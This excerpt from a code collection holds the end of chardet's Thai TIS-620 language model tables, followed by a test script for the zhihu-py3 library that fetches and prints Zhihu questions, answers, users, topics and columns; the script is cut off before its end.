# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# The following result for thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40
188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50
253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60
96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70
209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222,
223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235,
236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57,
49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54,
45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63,
22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244,
11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247,
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences:7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2,
3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2,
3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1,
3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1,
3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1,
2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1,
3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2,
1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3,
3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0,
1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2,
0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3,
0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0,
3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1,
2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2,
0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2,
3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0,
2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,
3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1,
2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1,
3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0,
3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1,
3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1,
3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1,
1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2,
0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3,
0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,
3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0,
3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1,
1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0,
3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1,
3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2,
0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0,
0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0,
1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1,
1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,
3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1,
0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0,
3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0,
0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1,
0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0,
0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1,
0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,
0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0,
0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1,
0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0,
0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0,
0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,
3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1,
2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,
0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0,
3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0,
1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,
1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
TIS620ThaiModel = {
'charToOrderMap': TIS620CharToOrderMap,
'precedenceMatrix': ThaiLangModel,
'mTypicalPositiveRatio': 0.926386,
'keepEnglishLetter': False,
'charsetName': "TIS-620"
}
# flake8: noqa
| apache-2.0 |
wuhy80/zhihu-py3 | test/zhihu-test.py | 3 | 15149 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
import os
import shutil
from zhihu import ZhihuClient, ActType
def test_question():
url = 'http://www.zhihu.com/question/24825703'
question = client.question(url)
# 获取该问题的详细描述
print(question.title)
# 亲密关系之间要说「谢谢」吗?
# 获取该问题的详细描述
print(question.details)
# 从小父母和大家庭里,.......什么时候不该说"谢谢”??
# 获取回答个数
print(question.answer_num)
# 630
# 获取关注该问题的人数
print(question.follower_num)
# 4326
# 获取关注问题的用户
for _, follower in zip(range(0, 10), question.followers):
print(follower.name)
# J Drop
# 熊猫
# Steve He
# ...
# 获取该问题所属话题
print(question.topics)
# ['心理学', '恋爱', '社会', '礼仪', '亲密关系']
# 获取排名第一的回答的点赞数
print(question.top_answer.upvote_num)
# 197
# 获取排名前十的十个回答的点赞数
for answer in question.top_i_answers(10):
print(answer.author.name, answer.upvote_num)
# 49
# 89
# 425
# ...
def test_answer():
url = 'http://www.zhihu.com/question/24825703/answer/30975949'
answer = client.answer(url)
# 获取答案url
print(answer.url)
# 获取该答案所在问题标题
print(answer.question.title)
# 关系亲密的人之间要说「谢谢」吗?
# 获取该答案作者名
print(answer.author.name)
# 甜阁下
# 获取答案赞同数
print(answer.upvote_num)
# 1155
# 获取答案点赞人昵称和感谢赞同提问回答数
for _, upvoter in zip(range(1, 10), answer.upvoters):
print(upvoter.name, upvoter.upvote_num, upvoter.thank_num,
upvoter.question_num, upvoter.answer_num, upvoter.is_zero_user())
# ...
# 五月 42 15 3 35
# 陈半边 6311 1037 3 101
# 刘柯 3107 969 273 36
#
# 三零用户比例 36.364%
# 获取答案内容的HTML
print(answer.content)
# <html>
# ...
# </html>
# 保存HTML
answer.save(filepath='.')
# 当前目录下生成 "亲密关系之间要说「谢谢」吗? - 甜阁下.html"
# 保存markdown
answer.save(filepath='.', mode="md")
# 当前目录下生成 "亲密关系之间要说「谢谢」吗? - 甜阁下.md"
def test_author():
url = 'http://www.zhihu.com/people/7sdream'
author = client.author(url)
# 获取用户名称
print(author.name)
# 7sDream
# 获取用户介绍
print(author.motto)
# 二次元新居民/软件爱好者/零回答消灭者
# 获取用户头像地址
print(author.photo_url)
# http://pic3.zhimg.com/893fd554c8aa57196d5ab98530ef479a_r.jpg
# 获取用户得到赞同数
print(author.upvote_num)
# 1338
# 获取用户得到感谢数
print(author.thank_num)
# 468
# 获取用户关注人数
print(author.followee_num)
# 82
# 获取用户关注人
for _, followee in zip(range(0, 10), author.followees):
print(followee.name)
# yuwei
# falling
# 伍声
# bhuztez
# 段晓晨
# 冯东
# ...
# 获取用户粉丝数
print(author.follower_num)
# 303
# 获得用户粉丝
for _, follower in zip(range(0, 10), author.followers):
print(follower.name)
# yuwei
# falling
# 周非
# 陈泓瑾
# O1Operator
# ...
# 获取用户提问数
print(author.question_num)
# 16
# 获取用户所有提问的标题
for _, question in zip(range(0, 10), author.questions):
print(question.title)
# 用户「松阳先生」的主页出了什么问题?
# C++运算符重载在头文件中应该如何定义?
# 亚马逊应用市场的应用都是正版的吗?
# ...
# 获取用户答题数
print(author.answer_num)
# 247
# 获取用户所有回答的点赞数
for _, answer in zip(range(0, 10), author.answers):
print(answer.upvote_num)
# 0
# 5
# 12
# 0
# ...
# 获取用户文章数
print(author.post_num)
# 0
# 获取用户专栏名
for column in author.columns:
print(column.name)
# 我没有专栏T^T
# 获取用户收藏夹数
print(author.collection_num)
# 5
# 获取用户收藏夹名
for collection in author.collections:
print(collection.name)
# 教学精品。
# 可以留着慢慢看~
# OwO
# 一句。
# Read it later
# 获取用户动态
for _, act in zip(range(0, 10), author.activities):
print(act.content.url)
if act.type == ActType.FOLLOW_COLUMN:
print('%s 在 %s 关注了专栏 %s' %
(author.name, act.time, act.column.name))
elif act.type == ActType.FOLLOW_QUESTION:
print('%s 在 %s 关注了问题 %s' %
(author.name, act.time, act.question.title))
elif act.type == ActType.ASK_QUESTION:
print('%s 在 %s 提了个问题 %s' %
(author.name, act.time, act.question.title))
elif act.type == ActType.UPVOTE_POST:
print('%s 在 %s 赞同了专栏 %s 中 %s 的文章 %s, '
'此文章赞同数 %d, 评论数 %d' %
(author.name, act.time, act.post.column.name,
act.post.author.name, act.post.title, act.post.upvote_num,
act.post.comment_num))
elif act.type == ActType.PUBLISH_POST:
print('%s 在 %s 在专栏 %s 中发布了文章 %s, '
'此文章赞同数 %d, 评论数 %d' %
(author.name, act.time, act.post.column.name,
act.post.title, act.post.upvote_num,
act.post.comment_num))
elif act.type == ActType.UPVOTE_ANSWER:
print('%s 在 %s 赞同了问题 %s 中 %s(motto: %s) 的回答, '
'此回答赞同数 %d' %
(author.name, act.time, act.answer.question.title,
act.answer.author.name, act.answer.author.motto,
act.answer.upvote_num))
elif act.type == ActType.ANSWER_QUESTION:
print('%s 在 %s 回答了问题 %s 此回答赞同数 %d' %
(author.name, act.time, act.answer.question.title,
act.answer.upvote_num))
elif act.type == ActType.FOLLOW_TOPIC:
print('%s 在 %s 关注了话题 %s' %
(author.name, act.time, act.topic.name))
def test_collection():
url = 'http://www.zhihu.com/collection/28698204'
collection = client.collection(url)
# 获取收藏夹名字
print(collection.name)
# 可以用来背的答案
# 获取收藏夹关注人数
print(collection.follower_num)
# 6343
# 获取收藏夹关注用户
for _, follower in zip(range(0, 10), collection.followers):
print(follower.name)
# 花椰菜
# 邱火羽白
# 枫丹白露
# ...
# 获取收藏夹创建者名字
print(collection.owner.name)
# 7sDream
# 获取收藏夹内所有答案的点赞数
for _, answer in zip(range(0, 10), collection.answers):
print(answer.upvote_num)
# 2561
# 535
# 223
# ...
# 获取收藏夹内所有问题标题
for _, question in zip(range(0, 10), collection.questions):
print(question.title)
# 如何完成标准的平板支撑?
# 有没有适合 Android 开发初学者的 App 源码推荐?
# 如何挑逗女朋友?
# 有哪些计算机的书适合推荐给大一学生?
# ...
def test_column():
url = 'http://zhuanlan.zhihu.com/xiepanda'
column = client.column(url)
# 获取专栏名
print(column.name)
# 谢熊猫出没注意
# 获取关注人数
print(column.follower_num)
# 73570
# 获取文章数量
print(column.post_num)
# 68
# 获取所有文章标题
for _, post in zip(range(0, 10), column.posts):
print(post.title)
# 伦敦,再见。London, Pride.
# 为什么你来到伦敦?——没有抽到h1b
# “城邦之国”新加坡强在哪?
# ...
def test_post():
url = 'http://zhuanlan.zhihu.com/xiepanda/19950456'
post = client.post(url)
# 获取文章地址
print(post.url)
# 获取文章标题
print(post.title)
# 为什么最近有很多名人,比如比尔盖茨,马斯克、霍金等,让人们警惕人工智能?
# 获取所在专栏名称
print(post.column.name)
# 谢熊猫出没注意
# 获取作者名称
print(post.author.name)
# 谢熊猫君
# 获取赞同数
print(post.upvote_num)
# 18491
# 获取评论数
print(post.comment_num)
# 1748
# 保存为 markdown
post.save(filepath='.')
# 当前目录下生成
# 为什么最近有很多名人,比如比尔盖茨,马斯克、霍金等,让人们警惕人工智能? - 谢熊猫君.md
def test_topic():
url = 'http://www.zhihu.com/topic/19947695/'
topic = client.topic(url)
# 获取话题地址
print(topic.url)
# http://www.zhihu.com/topic/19947695/
# 获取话题名称
print(topic.name)
# 深网(Deep Web)
# 获取话题描述信息
print(topic.description)
# 暗网(英语:Deep Web,又称深网、不可见网、隐藏网)
# 获取话题头像url
print(topic.photo_url)
# http://pic1.zhimg.com/a3b0d77c052e45399da1fe26fb4c9734_r.jpg
# 获取话题关注人数
print(topic.follower_num)
# 3309
# 获取关注者
for _, follower in zip(range(0, 10), topic.followers):
print(follower.name, follower.motto)
# 韦小宝 韦小宝
# 吉陆遥 吉陆遥
# qingyuan ma qingyuan ma
# ...
# 获取父话题
for _, parent in zip(range(0, 10), topic.parents):
print(parent.name)
# 互联网
# 获取子话题
for _, child in zip(range(0, 10), topic.children):
print(child.name)
# Tor
# 获取优秀答主
for _, author in zip(range(0, 10), topic.top_authors):
print(author.name, author.motto)
# Ben Chen
# acel rovsion 我只不过规范基点上的建构论者
# 沈万马
# ...
# 获取话题下的精华回答
for _, ans in zip(range(0, 10), topic.top_answers):
print(ans.question.title, ans.author.name, ans.upvote_num)
# 《纸牌屋》中提到的深网 (Deep Web) 是什么? Ben Chen 2956
# 黑客逃避追踪,为什么要用虚拟机 + TOR + VPN 呢? Ario 526
# 《纸牌屋》中提到的深网 (Deep Web) 是什么? acel rovsion 420
# ...
# 获取所有问题
for _, question in zip(range(0, 10), topic.questions):
print(question.title)
# 马里亚纳网络存在吗?
# 玛丽亚纳网络存在吗?
# 为什么暗网里这么多违法的东西FBI不顺藤摸瓜呢?
# ...
# 获取话题下的热门动态问题,按热门度由高到底返回
for _, q in zip(range(0, 10), topic.hot_questions):
print(q.title)
# 《纸牌屋》中提到的深网 (Deep Web) 是什么?
# 黑客逃避追踪,为什么要用虚拟机 + TOR + VPN 呢?
# 微博热传的关于暗网的变态故事是真的还是假的啊?
# ...
def test_me():
"""
本函数默认不会开启,因为函数涉及到点赞,反对,感谢,关注等主观操作
请确认您有能力在测试代码生错误的情况下,判断出出错在哪一行,
并将代码进行的操作回滚(即:将点赞,感谢,关注等操作取消)
如果确认有能力,请填写代码中的空白,并将test函数中相关行注释取消
"""
answer = client.answer('') # 填写答案Url,不可填写自己的答案
post = client.post('') # 填写文章Url,不可填写自己的文章
author = client.author('') # 填写用户Url,不可填写自己
question = client.question('') # 填写问题Url
topic = client.topic('') # 填写话题Url
collection = client.collection('') # 填写收藏夹Url
me = client.me()
print('赞同答案...', end='')
assert me.vote(answer, 'up') # 赞同
assert me.vote(answer, 'down') # 反对
assert me.vote(answer, 'clear') # 清除
print('通过')
print('感谢答案...', end='')
assert me.thanks(answer) # 感谢
assert me.thanks(answer, False) # 取消感谢
print('通过')
print('赞同文章...', end='')
assert me.vote(post, 'up') # 赞同
assert me.vote(post, 'down') # 反对
assert me.vote(post, 'clear') # 清除
print('通过')
print('关注用户...', end='')
assert me.follow(author) # 关注
assert me.follow(author, False) # 取消关注
print('通过')
print('关注问题...', end='')
assert me.follow(question) # 关注
assert me.follow(question, False) # 取消关注
print('通过')
print('关注话题...', end='')
assert me.follow(topic) # 关注
assert me.follow(topic, False) # 取消关注
print('通过')
print('关注收藏夹...', end='')
assert me.follow(collection) # 关注
assert me.follow(collection, False) # 取消关注
print('通过')
def test():
test_question()
test_answer()
test_author()
test_collection()
test_column()
test_post()
test_topic()
# test_me()
if __name__ == '__main__':
Cookies_File = 'cookies.json'
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
TEST_DIR = os.path.join(BASE_DIR, 'test')
print("Test dir: ", TEST_DIR)
if os.path.exists(TEST_DIR):
print("Cleaning it...", end='')
shutil.rmtree(TEST_DIR)
print("Done")
else:
print("Test dir not exist.")
os.chdir(BASE_DIR)
if os.path.isfile(Cookies_File):
print("Cookies file found.")
client = ZhihuClient(Cookies_File)
else:
print("Cookies file not exist, please login...")
client = ZhihuClient()
cookies_str = client.login_in_terminal()
with open(Cookies_File, 'w') as f:
f.write(cookies_str)
print("Making test dir...", end="")
os.mkdir(TEST_DIR)
print("Done", end="\n\n")
os.chdir(TEST_DIR)
print("===== test start =====")
import timeit
try:
time = timeit.timeit(
'test()', setup='from __main__ import test', number=1)
print('===== test passed =====')
print('no error happen')
